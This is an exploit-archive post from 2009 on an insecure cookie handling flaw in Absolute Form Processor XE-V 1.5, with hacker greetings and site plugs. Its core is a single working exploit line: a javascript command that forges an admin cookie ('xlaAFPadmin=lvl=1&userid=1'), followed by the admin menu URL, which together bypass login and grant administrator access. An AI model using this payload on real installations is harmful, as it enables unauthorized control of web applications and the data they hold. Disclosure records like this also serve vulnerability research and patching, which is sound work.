[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
# Published : 2009-04-24
# Author : ZoRLu
# Previous Title : Absolute Form Processor XE-V 1.5 Remote Change Pasword Exploit
# Next Title : Photo-Rigma.BiZ v30 (SQL/XSS) Multiple Remote Vulnerabilities
[~] Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 11.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------
exploit:
javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";
after you go here:
http://www.xigla.com/absolutefp/demo/menu.asp
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org / dafgamers.com
[~]
[~]----------------------------------------------------------------------
# www.Syue.com [2009-04-24]